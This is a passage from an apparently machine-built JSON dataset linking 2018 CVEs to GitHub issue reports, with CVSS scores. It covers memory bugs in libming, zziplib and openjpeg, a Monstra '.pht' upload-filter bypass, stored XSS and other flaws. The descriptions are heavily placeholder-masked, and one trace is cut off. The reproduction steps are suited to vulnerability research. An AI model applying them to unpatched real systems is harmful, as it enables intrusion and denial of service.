  31576. "impactScore": 5.9,
  31577. "exploitabilityScore": 2.2
  31578. },
  31579. {
  31580. "CVE_ID": "CVE-2018-6315",
  31581. "Issue_Url_old": "https://github.com/libming/libming/issues/101",
  31582. "Issue_Url_new": "https://github.com/libming/libming/issues/101",
  31583. "Repo_new": "libming/libming",
  31584. "Issue_Created_At": "2018-01-12T00:48:40Z",
  31585. "description": "NULL pointer dereference in APITAG . Hello. I found a NULL pointer dereference in libming. Please confirm. Thanks. Summary: NULL pointer dereference OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: FILETAG Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : swftocxx $FILE out ERRORTAG ========== APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
  31586. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31587. "severity": "HIGH",
  31588. "baseScore": 8.8,
  31589. "impactScore": 5.9,
  31590. "exploitabilityScore": 2.8
  31591. },
  31592. {
  31593. "CVE_ID": "CVE-2018-6353",
  31594. "Issue_Url_old": "https://github.com/spesmilo/electrum/issues/3678",
  31595. "Issue_Url_new": "https://github.com/spesmilo/electrum/issues/3678",
  31596. "Repo_new": "spesmilo/electrum",
  31597. "Issue_Created_At": "2018-01-09T02:56:47Z",
  31598. "description": "why is it possible to execute arbitrary system commands via python code through the electrum console. wondering why it is currently possible to execute arbitrary system commands via python code through the electrum console, and why there is no whitelisting/blacklisting of allowed methods/functions as this seems like a major security issue",
  31599. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31600. "severity": "HIGH",
  31601. "baseScore": 7.8,
  31602. "impactScore": 5.9,
  31603. "exploitabilityScore": 1.8
  31604. },
  31605. {
  31606. "CVE_ID": "CVE-2018-6358",
  31607. "Issue_Url_old": "https://github.com/libming/libming/issues/104",
  31608. "Issue_Url_new": "https://github.com/libming/libming/issues/104",
  31609. "Repo_new": "libming/libming",
  31610. "Issue_Created_At": "2018-01-26T10:13:05Z",
  31611. "description": "Heap Buffer Overflow in listfdb (master, libming NUMBERTAG and earlier). The APITAG function (util/listfdb.c) in libming through NUMBERTAG is vulnerable to a heap buffer overflow. This vulnerability is also affecting the master branch. Reproduce: APITAG Output: ERRORTAG This may allow attackers to cause a denial of service or unspecified other impact via a crafted FDB file. You can find the reproducer FILETAG .",
  31612. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31613. "severity": "HIGH",
  31614. "baseScore": 8.8,
  31615. "impactScore": 5.9,
  31616. "exploitabilityScore": 2.8
  31617. },
  31618. {
  31619. "CVE_ID": "CVE-2018-6359",
  31620. "Issue_Url_old": "https://github.com/libming/libming/issues/105",
  31621. "Issue_Url_new": "https://github.com/libming/libming/issues/105",
  31622. "Repo_new": "libming/libming",
  31623. "Issue_Created_At": "2018-01-27T10:51:57Z",
  31624. "description": "heap use after free in APITAG Hello. I found a heap use after free bug in libming. Please confirm. Thanks. Summary: heap use after free OS: APITAG NUMBERTAG bit Version: APITAG APITAG Download: Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG APITAG the following command : ./swftocxx $POC /dev/null ERRORTAG ================= APITAG This work was supported by ICT R&D program of MSIP/IITP. [R NUMBERTAG Innovation hub for high Performance Computing]",
  31625. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31626. "severity": "HIGH",
  31627. "baseScore": 8.8,
  31628. "impactScore": 5.9,
  31629. "exploitabilityScore": 2.8
  31630. },
  31631. {
  31632. "CVE_ID": "CVE-2018-6360",
  31633. "Issue_Url_old": "https://github.com/mpv-player/mpv/issues/5456",
  31634. "Issue_Url_new": "https://github.com/mpv-player/mpv/issues/5456",
  31635. "Repo_new": "mpv-player/mpv",
  31636. "Issue_Created_At": "2018-01-27T23:44:09Z",
  31637. "description": "Protocol whitelist in ytdl_hook. The recent commits APITAG APITAG APITAG and APITAG fix an issue whereby mpv could be convinced to play a \"non safe\" URL from a remote source. Reproduction steps An attacker convinces the victim to play an HTTP(S) URL. APITAG The URL gets processed by the FILETAG script. youtube dl attempts to extract videos from the URL by contacting the HTTP server, which responds with something like (text/html mime typed) : CODETAG As youtube dl does not perform any validation on the extracted URLs for APITAG tags, the APITAG URL gets passed back to the hook script. APITAG that there are likely many ways URLTAG in which youtube dl can return \"bad\" URLs._ The hook script then passes the extracted URL to mpv, which does not apply the usual safe protocol only checks URLTAG . As shown in the example above, this URL can be, for instance, used to APITAG URLTAG arbitrary files on the filesystem using the ffmpeg lavfi ladspa plugin.",
  31638. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31639. "severity": "HIGH",
  31640. "baseScore": 8.8,
  31641. "impactScore": 5.9,
  31642. "exploitabilityScore": 2.8
  31643. },
  31644. {
  31645. "CVE_ID": "CVE-2018-6381",
  31646. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/12",
  31647. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/12",
  31648. "Repo_new": "gdraheim/zziplib",
  31649. "Issue_Created_At": "2018-01-29T05:19:41Z",
  31650. "description": "Invalid memory access in zzip_disk_fread ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a segmentation fault caused by invalid memory access in zzip_disk_fread function ( PATHTAG ), which could be triggered by the POC below. The issue happens since with the crafted zip file, in line NUMBERTAG of zzip_disk_fread function, \"size\" variable could be much larger than the capacity of \"file >stored\". Note that this function dwells in library code, which means programs based on libzzip could be affected NUMBERTAG if (file >stored NUMBERTAG memcpy(ptr, file >stored, size NUMBERTAG file >stored += size NUMBERTAG file >avail = size NUMBERTAG return size NUMBERTAG To reproduce the issue, run: ./unzip mem $POC The POC could be downloaded at: FILETAG The backtrace is: (gdb) bt NUMBERTAG ffff NUMBERTAG ERRORTAG NUMBERTAG in __memcpy_ssse3 () from APITAG NUMBERTAG ffff7bd7cd3 in zzip_disk_fread (ptr NUMBERTAG fffffffd7b0, sized NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG ffff7bd8a NUMBERTAG in zzip_mem_disk_fread (ptr NUMBERTAG fffffffd7b0, size NUMBERTAG nmemb NUMBERTAG file NUMBERTAG at PATHTAG NUMBERTAG c8c in zzip_mem_entry_pipe (disk NUMBERTAG entry NUMBERTAG out NUMBERTAG e0) at PATHTAG NUMBERTAG cfe in zzip_mem_entry_make (disk NUMBERTAG entry NUMBERTAG at PATHTAG NUMBERTAG b5 in zzip_mem_entry_makeall (disk NUMBERTAG at PATHTAG NUMBERTAG c7f in main (argc NUMBERTAG arg NUMBERTAG fffffffdd NUMBERTAG at PATHTAG",
  31651. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31652. "severity": "MEDIUM",
  31653. "baseScore": 6.5,
  31654. "impactScore": 3.6,
  31655. "exploitabilityScore": 2.8
  31656. },
  31657. {
  31658. "CVE_ID": "CVE-2018-6383",
  31659. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/429",
  31660. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/429",
  31661. "Repo_new": "monstra-cms/monstra",
  31662. "Issue_Created_At": "2018-01-29T12:59:28Z",
  31663. "description": "'pht' extension can bypass the extension filter in uploading process. Brief of this vulnerability In uploading process, Monstra filters some of dangerous extensions using blacklist. But it is not perfect because default setting of \"libapache2 mod php5\" allow 'pht' to execute php scripts. Test Environment APITAG APITAG PHP NUMBERTAG deb8u1 (cli) Affect version NUMBERTAG Payload NUMBERTAG Save php codes with '.pht' extensions. and upload it like below. APITAG NUMBERTAG Click the uploaded file name or move to APITAG NUMBERTAG Profit! Reason of Vulnerability Default setting of php5 module for apache2(libapache2 mod php5) allow several extensions to execute as php script. This is some part of APITAG . CODETAG Because of this config, list of extension allowed to run php script is APITAG and 'phps' extension shows source code of php file. But Monstra prevent to upload php style files using extension filter in uploading process at APITAG like below. CODETAG Almost all extensions allowed to execute as php can be filtered but 'pht' is not. As a result, attacker can upload malicious php file using pht extensions.",
  31664. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31665. "severity": "HIGH",
  31666. "baseScore": 8.8,
  31667. "impactScore": 5.9,
  31668. "exploitabilityScore": 2.8
  31669. },
  31670. {
  31671. "CVE_ID": "CVE-2018-6405",
  31672. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/964",
  31673. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/964",
  31674. "Repo_new": "imagemagick/imagemagick",
  31675. "Issue_Created_At": "2018-01-30T04:23:18Z",
  31676. "description": "coders/dcm.c Memory Leak. System Configuration APITAG version: APITAG NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: compilation with asan Description Occur Memory Leak URLTAG $ ./magick convert ~/leak1.dcm FILETAG convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG FILETAG ' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c8a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG f8ea NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). $ ./magick convert ~/leak3.dcm ./a.png convert: APITAG ERRORTAG PATHTAG @ PATHTAG convert: APITAG `./a.png' @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bd NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG d1d in APITAG ( PATHTAG NUMBERTAG dcd in APITAG ( PATHTAG NUMBERTAG c NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af NUMBERTAG in APITAG ( PATHTAG NUMBERTAG af4ff4 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG in APITAG ( PATHTAG NUMBERTAG e8af9 in APITAG ( PATHTAG NUMBERTAG e NUMBERTAG in main ( PATHTAG NUMBERTAG fb NUMBERTAG bdc NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). Crash File : FILETAG Credit : Kyeongseok Yang & Choongwoo Han, Naver Security Team",
  31677. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31678. "severity": "MEDIUM",
  31679. "baseScore": 6.5,
  31680. "impactScore": 3.6,
  31681. "exploitabilityScore": 2.8
  31682. },
  31683. {
  31684. "CVE_ID": "CVE-2018-6470",
  31685. "Issue_Url_old": "https://github.com/dignajar/nibbleblog/issues/120",
  31686. "Issue_Url_new": "https://github.com/dignajar/nibbleblog/issues/120",
  31687. "Repo_new": "dignajar/nibbleblog",
  31688. "Issue_Created_At": "2018-02-01T11:02:23Z",
  31689. "description": "APITAG Information leak. Nibbleblog NUMBERTAG on APITAG defaults to having APITAG in each directory, causing APITAG information to leak.",
  31690. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  31691. "severity": "MEDIUM",
  31692. "baseScore": 5.3,
  31693. "impactScore": 1.4,
  31694. "exploitabilityScore": 3.9
  31695. },
  31696. {
  31697. "CVE_ID": "CVE-2018-6480",
  31698. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
  31699. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/159",
  31700. "Repo_new": "cn-uofbasel/ccn-lite",
  31701. "Issue_Created_At": "2018-01-30T10:22:49Z",
  31702. "description": "type confusion in APITAG Hi, the following code in APITAG assumes that the union member s is of type ccnl_pktdetail_ndntlv_s . However, if the type is in fact of type struct ccnl_pktdetail_ccntlv_s or struct ccnl_pktdetail_iottlv_s , the memory at that point is either uninitialised or points to data which is not a nonce , which renders the code using the local variable nonce pointless. CODETAG This goes on and on. The function in APITAG (guarded by a USE_DUP_CHECK ) also starts to iterate over the pit and checks if the (maybe non existing nonce field) matches data in the pit, i.e. CODETAG If this is an issue how do we handle it? I would start writing checks and guards, but I want to make sure that you consider this an issue as well. TIA Michael",
  31703. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  31704. "severity": "HIGH",
  31705. "baseScore": 8.8,
  31706. "impactScore": 5.9,
  31707. "exploitabilityScore": 2.8
  31708. },
  31709. {
  31710. "CVE_ID": "CVE-2018-6484",
  31711. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/14",
  31712. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/14",
  31713. "Repo_new": "gdraheim/zziplib",
  31714. "Issue_Created_At": "2018-02-01T03:19:18Z",
  31715. "description": "Bus error in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer orig NUMBERTAG struct zzip_disk_trailer ) tail NUMBERTAG trailer >zz_rootseek = APITAG To reproduce the issue, run: ./zzdir $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG d NUMBERTAG a NUMBERTAG note: pointer points here NUMBERTAG",
  31716. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31717. "severity": "MEDIUM",
  31718. "baseScore": 6.5,
  31719. "impactScore": 3.6,
  31720. "exploitabilityScore": 2.8
  31721. },
  31722. {
  31723. "CVE_ID": "CVE-2018-6536",
  31724. "Issue_Url_old": "https://github.com/Icinga/icinga2/issues/5991",
  31725. "Issue_Url_new": "https://github.com/icinga/icinga2/issues/5991",
  31726. "Repo_new": "icinga/icinga2",
  31727. "Issue_Created_At": "2018-01-16T18:53:37Z",
  31728. "description": "Partial privilege escalation via PID file manipulation. The icinga2 daemon creates its PID file after dropping privileges to the APITAG . That may be exploited through the init script (or other management tools) by the APITAG to kill root processes, since when the daemon is stopped, root sends a \"kill\" signal to the contents of the PID file (which are under the control of the runtime user). For example, APITAG However, the init script ( APITAG ) is executed as root, and does, ERRORTAG If the daemon is in any way compromised, the APITAG can write a PID of his choice into his own PID file. The next time the icinga2 service is stopped, his desired PID will be killed. That can be abused to kill off sshd, to reboot the machine, etc. The \"easy\" way to work around this problem is to create the PID file as root, before dropping privileges. That comes with its own set of problems, in particular that you won't be able to modify or delete the PID file in the forked (non root) process. It does however allow a very dumb, portable, init script to handle the PID file safely.",
  31729. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  31730. "severity": "MEDIUM",
  31731. "baseScore": 5.5,
  31732. "impactScore": 3.6,
  31733. "exploitabilityScore": 1.8
  31734. },
  31735. {
  31736. "CVE_ID": "CVE-2018-6540",
  31737. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/15",
  31738. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/15",
  31739. "Repo_new": "gdraheim/zziplib",
  31740. "Issue_Created_At": "2018-02-01T14:09:11Z",
  31741. "description": "Bus error in zzip_disk_findfirst ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from CVETAG . The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG struct zzip_disk_trailer trailer = (struct zzip_disk_trailer ) p NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG fc NUMBERTAG f2 for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG fc NUMBERTAG f2: note: pointer points here NUMBERTAG b5 b5 b5 b5 b5 b5 b NUMBERTAG",
  31742. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31743. "severity": "MEDIUM",
  31744. "baseScore": 6.5,
  31745. "impactScore": 3.6,
  31746. "exploitabilityScore": 2.8
  31747. },
  31748. {
  31749. "CVE_ID": "CVE-2018-6541",
  31750. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/16",
  31751. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/16",
  31752. "Repo_new": "gdraheim/zziplib",
  31753. "Issue_Created_At": "2018-02-01T16:17:31Z",
  31754. "description": "Bus error when handling disk NUMBERTAG trailer in __zzip_fetch_disk_trailer ( PATHTAG ). On latest version NUMBERTAG and master branch of zziplib: there is a bus error caused by loading of misaligned address when handling disk NUMBERTAG trailer local entries in __zzip_fetch_disk_trailer function of PATHTAG which could be triggered by the POC below. The issue happens since the struct zzip_disk_trailer \"orig\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. This issue is different from CVETAG , and arises when invoking a different function NUMBERTAG APITAG NUMBERTAG trailer >zz_finalentries NUMBERTAG APITAG To reproduce the issue, run: ./unzzip p $POC FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f1d4f NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f1d4f NUMBERTAG note: pointer points here NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG dd e NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG",
  31755. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31756. "severity": "MEDIUM",
  31757. "baseScore": 6.5,
  31758. "impactScore": 3.6,
  31759. "exploitabilityScore": 2.8
  31760. },
  31761. {
  31762. "CVE_ID": "CVE-2018-6542",
  31763. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/17",
  31764. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/17",
  31765. "Repo_new": "gdraheim/zziplib",
  31766. "Issue_Created_At": "2018-02-01T16:17:35Z",
  31767. "description": "Bus error when handling (root seek of disk NUMBERTAG trailer) in zzip_disk_findfirst ( PATHTAG ) . On latest version NUMBERTAG and master branch of zziplib: there is a bus error (when handling seek of disk NUMBERTAG trailer) caused by loading of misaligned address in zzip_disk_findfirst function of PATHTAG which could be triggered by the POC below. Note that this issue is different from URLTAG The issue happens since the pointer \"trailer\" (line NUMBERTAG could be manipulated by a crafted zip file, resulting in a misaligned memory access and bus error. Note that the issue is in libzip and may affect downstream programs. The POC is as small as NUMBERTAG bytes NUMBERTAG zzip_size_t rootseek = APITAG To reproduce the issue, run: ./unzip mem p $POC The POC could be downloaded at: FILETAG PATHTAG runtime error: load of misaligned address NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG for type 'uint NUMBERTAG t', which requires NUMBERTAG byte alignment NUMBERTAG f NUMBERTAG f NUMBERTAG e NUMBERTAG note: pointer points here NUMBERTAG d NUMBERTAG",
  31768. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  31769. "severity": "MEDIUM",
  31770. "baseScore": 6.5,
  31771. "impactScore": 3.6,
  31772. "exploitabilityScore": 2.8
  31773. },
  31774. {
  31775. "CVE_ID": "CVE-2018-6550",
  31776. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/427",
  31777. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/427",
  31778. "Repo_new": "monstra-cms/monstra",
  31779. "Issue_Created_At": "2018-01-23T10:58:03Z",
  31780. "description": "Stored Cross Site Scripting Vulnerability . Hi, I have found a stored XSS vulnerability. Affected Version NUMBERTAG or before Affected URL: FILETAG Payload ERRORTAG Steps to replicate NUMBERTAG Goto URLTAG NUMBERTAG Create a new page NUMBERTAG Navigate to link section NUMBERTAG Enter payload as shown in above section NUMBERTAG isit FILETAG NUMBERTAG You will triage APITAG execution Impacts: A user with editor level privileges can make APITAG code execution in admin's session. Testing Environment NUMBERTAG Server: Apache NUMBERTAG PHP NUMBERTAG Mitigation: Pass user input from below mentioned function ERRORTAG",
  31781. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  31782. "severity": "MEDIUM",
  31783. "baseScore": 5.4,
  31784. "impactScore": 2.7,
  31785. "exploitabilityScore": 2.3
  31786. },
  31787. {
  31788. "CVE_ID": "CVE-2018-6558",
  31789. "Issue_Url_old": "https://github.com/google/fscrypt/issues/77",
  31790. "Issue_Url_new": "https://github.com/google/fscrypt/issues/77",
  31791. "Repo_new": "google/fscrypt",
  31792. "Issue_Created_At": "2018-01-23T18:16:14Z",
  31793. "description": "pam_fscrypt messes up user groups during login. I've added APITAG to APITAG (on Arch Linux) as described in the README: CODETAG With APITAG enabled, I'm no longer in the wheel group after login for some reason, which means I can no longer use sudo . Instead, it adds me to the root group: APITAG With APITAG commented out: APITAG Log: ERRORTAG Any ideas? :)",
  31794. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  31795. "severity": "MEDIUM",
  31796. "baseScore": 6.5,
  31797. "impactScore": 3.6,
  31798. "exploitabilityScore": 2.8
  31799. },
  31800. {
  31801. "CVE_ID": "CVE-2018-6574",
  31802. "Issue_Url_old": "https://github.com/golang/go/issues/23672",
  31803. "Issue_Url_new": "https://github.com/golang/go/issues/23672",
  31804. "Repo_new": "golang/go",
  31805. "Issue_Created_At": "2018-02-02T21:36:18Z",
  31806. "description": "security: issue [Go NUMBERTAG rc1]. Placeholder issue for cause of next week's security release. Will be filled in at release time. /cc MENTIONTAG",
  31807. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  31808. "severity": "HIGH",
  31809. "baseScore": 7.8,
  31810. "impactScore": 5.9,
  31811. "exploitabilityScore": 1.8
  31812. },
  31813. {
  31814. "CVE_ID": "CVE-2018-6594",
  31815. "Issue_Url_old": "https://github.com/dlitz/pycrypto/issues/253",
  31816. "Issue_Url_new": "https://github.com/pycrypto/pycrypto/issues/253",
  31817. "Repo_new": "pycrypto/pycrypto",
  31818. "Issue_Created_At": "2018-02-02T05:45:26Z",
  31819. "description": "Attack on APITAG APITAG Encryption with Proof of Concept APITAG Joint work with MENTIONTAG We attack APITAG URLTAG , a successor of APITAG The result is transferable. I repeat our post URLTAG here again: The textbook APITAG implementation is not secure. APITAG and its relevant implementations, APITAG and libgcrypt, use the wrong algorithm. I would give the basic idea as follows. Readers with modern algebra background can jump to MENTIONTAG 's explanation here URLTAG . The wrong implementation has two messages classes. Due to technical reasons, all messages are classified into two classes. A random message belongs to one of them (with NUMBERTAG possibility). FILETAG In some applications, there are only several possible messages. Consider we are sending a military message. There are only two outcomes: the army moved forward or retracted. With a high possibility, they belong to different classes. Encrypt the two messages. We now encrypt two messages with APITAG FILETAG The encrypted result is called a ciphertext. It should reveal NO information about the original message. Expectation: encrypted message has indistinguishability. We expect a secure encryption scheme to provide message indistinguishability. No adversary can learn what is encrypted inside the ciphertext better than a random guess. FILETAG Let us assume the headquarter sent the second message no adversary should to able to learn. Truth: the adversary can distinguish messages in two different classes. Due to the wrong implementation, the adversary can distinguish messages in different classes. FILETAG If the outcomes differ in which classes they belong to, then an adversary can infer more information. Proof of Concept APITAG We release our attack code in this APITAG repo: URLTAG A running trace is collected by Travis CI: URLTAG Showing that our adversary makes NUMBERTAG mistakes in guessing the messages if the two outcomes differ in the classes they belong to. 
Discussion The problem can be fixed by using APITAG carefully on the correct algebra group. Some results are given by MENTIONTAG and me on issue URLTAG . This bug is prevalent. It exists in legacy APITAG and libgcrypt (if used directly to encrypt messages).",
  31820. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  31821. "severity": "HIGH",
  31822. "baseScore": 7.5,
  31823. "impactScore": 3.6,
  31824. "exploitabilityScore": 3.9
  31825. },
  31826. {
  31827. "CVE_ID": "CVE-2018-6616",
  31828. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1059",
  31829. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1059",
  31830. "Repo_new": "uclouvain/openjpeg",
  31831. "Issue_Created_At": "2018-02-04T20:07:05Z",
  31832. "description": "Excessive Iteration in opj_t1_encode_cblks ( PATHTAG ). On the latest version NUMBERTAG and master branch of openjpeg, there is an excessive iteration in the opj_t1_encode_cblks function of PATHTAG which could be triggered by the POC below. Note that processing the POC of only NUMBERTAG bytes could cost openjpeg more than NUMBERTAG minutes. We found, in the code, the program is stuck in a NUMBERTAG level \"for\" loops of opj_t1_encode_cblks function. The terminating variables of these loops could be manipulated by the input file. Although the variables are quite reasonable (with prc >cw prc >ch NUMBERTAG the program gives no response for a long time and it causes denial of service. This issue is different from URLTAG which has been fixed in commit NUMBERTAG OPJ_BOOL opj_t1_encode_cblks(opj_t1_t t NUMBERTAG for (compno NUMBERTAG compno < tile >numcomps; ++compno NUMBERTAG for (resno NUMBERTAG resno < tilec >numresolutions; ++resno NUMBERTAG for (bandno NUMBERTAG bandno < res >numbands; ++bandno NUMBERTAG for (precno NUMBERTAG precno < res >pw res >ph; ++precno NUMBERTAG for (cblkno NUMBERTAG cblkno < prc >cw prc >ch; ++cblkno NUMBERTAG cblkno NUMBERTAG precno NUMBERTAG bandno NUMBERTAG resno NUMBERTAG compno NUMBERTAG return OPJ_TRUE NUMBERTAG To reproduce the issue, run: ./opj_compress n NUMBERTAG i $POC o /tmp/null.j2k POC: FILETAG Stack trace NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_t1_enc_sigpass_step (t NUMBERTAG bec0, flagsp NUMBERTAG a NUMBERTAG f4ac, datap NUMBERTAG fffdc NUMBERTAG a NUMBERTAG bpno NUMBERTAG one NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG ci NUMBERTAG sc NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ab in opj_t1_enc_sigpass (t NUMBERTAG bec0, bpno NUMBERTAG nmsedec NUMBERTAG fffffff7c NUMBERTAG type NUMBERTAG cblksty NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG ff1f8 in opj_t1_encode_cblk (t NUMBERTAG bec0, cblk NUMBERTAG d NUMBERTAG d7f NUMBERTAG orient NUMBERTAG compno NUMBERTAG level 
NUMBERTAG qmfbid NUMBERTAG stepsize NUMBERTAG cblksty NUMBERTAG numcomps NUMBERTAG tile NUMBERTAG fc NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe3f1 in opj_t1_encode_cblks (t NUMBERTAG bec0, tile NUMBERTAG fc NUMBERTAG tcp NUMBERTAG c NUMBERTAG mct_norms NUMBERTAG ffff NUMBERTAG dc NUMBERTAG APITAG , mct_numcomps NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG a in opj_tcd_t1_encode (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG dcf1 in opj_tcd_encode_tile (p_tcd NUMBERTAG b NUMBERTAG af NUMBERTAG p_tile_no NUMBERTAG p_dest NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_max_length NUMBERTAG p_cstr_info NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG ccadf in opj_j2k_write_sod (p_j2k NUMBERTAG de NUMBERTAG p_tile_coder NUMBERTAG b NUMBERTAG af NUMBERTAG p_data NUMBERTAG fff NUMBERTAG e NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff NUMBERTAG bc in opj_j2k_write_first_tile_part (p_j2k NUMBERTAG de NUMBERTAG p_data NUMBERTAG fff NUMBERTAG c PATHTAG NUMBERTAG repeats NUMBERTAG times>..., APITAG p_total_data_size NUMBERTAG p_stream NUMBERTAG c NUMBERTAG bf NUMBERTAG p_manager NUMBERTAG ea0) at PATHTAG NUMBERTAG ffff 